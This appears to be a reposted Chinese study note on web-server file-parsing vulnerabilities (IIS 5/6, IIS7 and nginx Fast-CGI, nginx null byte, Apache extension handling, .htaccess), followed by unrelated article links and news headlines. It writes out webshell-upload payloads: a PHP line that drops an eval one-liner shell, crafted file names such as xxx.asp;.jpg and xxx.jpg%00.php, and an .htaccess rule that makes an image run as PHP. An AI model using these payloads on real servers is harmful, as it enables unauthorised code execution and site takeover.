当前位置: 首页 > news >正文

解析漏洞总结

首先说下为什么要写着篇文章,之前学习倒是学过,学完就忘啊,tmd

iis 5.x/6.0

这个版本有两种解析姿势 

 一.两种解析漏洞

    1.目录解析
    2./xxx.asp/xx.jpg

  简单说一下是什么意思,这里是先在他服务器跟目录创建一个名为 xxx.asp 的文件夹,然后呢,将这个一句话木马上传到这个xxx.asp文件夹下

  它是怎么解析的?

  因为创建这个xxx.asp文件夹下的所有目录默认它都是按照asp文件来执行的,所以咱们上传上去的一句话,改为图片格式,也是可以正常执行的,那么就可以直接菜刀连接shell。


 二.文件解析漏洞

    xxx.asp;.jpg
    比如说上传一个一句话木马,将木马名字改为xxx.asp;.jpg 然后再上传,识别先从后往前,
    看到jpg文件然后就以为你是jpg文件可以上传,
    上传上去之后,服务器进行解析的时候他是从前往后的看到asp格式的文件直接进行解析

Apache解析

    xxx.php.xxxx    
    首先Apache解析文件时是从右往左判断的,如果右边第一次未识别他将继续往左解析,通常我们直接在文件名后边添加xxxx

IIS 7.0/IIS7.5/nginx <8.03 畸形解析漏洞

    80sec发现的
    在默认开启Fast-CGI开启的清空下,攻击者可以上传一个名字为xxx.jpg ,内容为
    <?php fputs(fopen('shell.php','w'),'<php eval($_POST[cmd])?>');?>
    的文件,然后访问xxx.jpg/.php,访问之后就在这个目录下生成一句话木马shell.php
    www.xxx.com/logo.gif/*.php 触发漏洞(有漏洞会吧前面文件当做php执行)

Nginx <8.03 空字节代码执行漏洞

影响版本:0.5 0.6 0.7<=0.7.65   0.8<=0.8.37
Nginx在图片中写入php代码然后通过访问
xxx.jpg%00.php
来执行其中的代码

htaccess文件解析

如果在Apache中.htaccess可被执行,且可被上传,那可以尝试在.htaccess中写入:
<FilesMatch  "shell.jpg"> setHandler application/x-httpd-php </FilessMatch>
然后在上传shell.jpg 的木马,这样的shell.jpg就可解析问php文件

相关文章:

  • Java 24新特性概述
  • 【初学者】Python语言中有没有指针类型?
  • 夯实 kafka 系列|第一章:初识 kafka
  • 模型(分类模型、回归模型、聚类模型)的评分指标
  • dns实现主服务器
  • leetcode hot100(五)
  • 【实用部署教程】olmOCR智能PDF文本提取系统:从安装到可视化界面实现
  • 企业年度经营计划制定与管理方法论(124页PPT)(文末有下载方式)
  • CSS Grid 布局
  • JVM OOM问题如何排查和解决
  • 面试提问:如何判断 Hive 表是内部表还是外部表?
  • MySQL 入门大全:运算符
  • 基于Selenium Grid的分布式测试架构设计与深度实践
  • springboot444-基于Vue的网络小说交流平台(源码+数据库+纯前后端分离+部署讲解等)
  • 【初学者】请介绍一下线性与非线性的区别?
  • Unity—从入门到精通(第一天)
  • 详细解析格式化消息框的代码
  • defineAsyncComponent和一般的import有什么区别
  • 微前端 qiankun vite vue3
  • cmake 之 CMakeLists.txt 中的函数是从哪里来的
  • 上海率先推进生物制品分段生产试点,这款国产1类创新药获批上市
  • 魔都眼|锦江乐园摩天轮“换代”开拆,新摩天轮暂定118米
  • 普京召开俄乌谈判筹备会议,拉夫罗夫、绍伊古等出席
  • 国际能源署:全球电动汽车市场强劲增长,中国市场继续领跑
  • 山东市监局回应“盒马一批次‘无抗’鸡蛋抽检不合格后复检合格”:系生产商自行送检
  • 国台办:民进党当局刻意刁难大陆配偶,这是不折不扣的政治迫害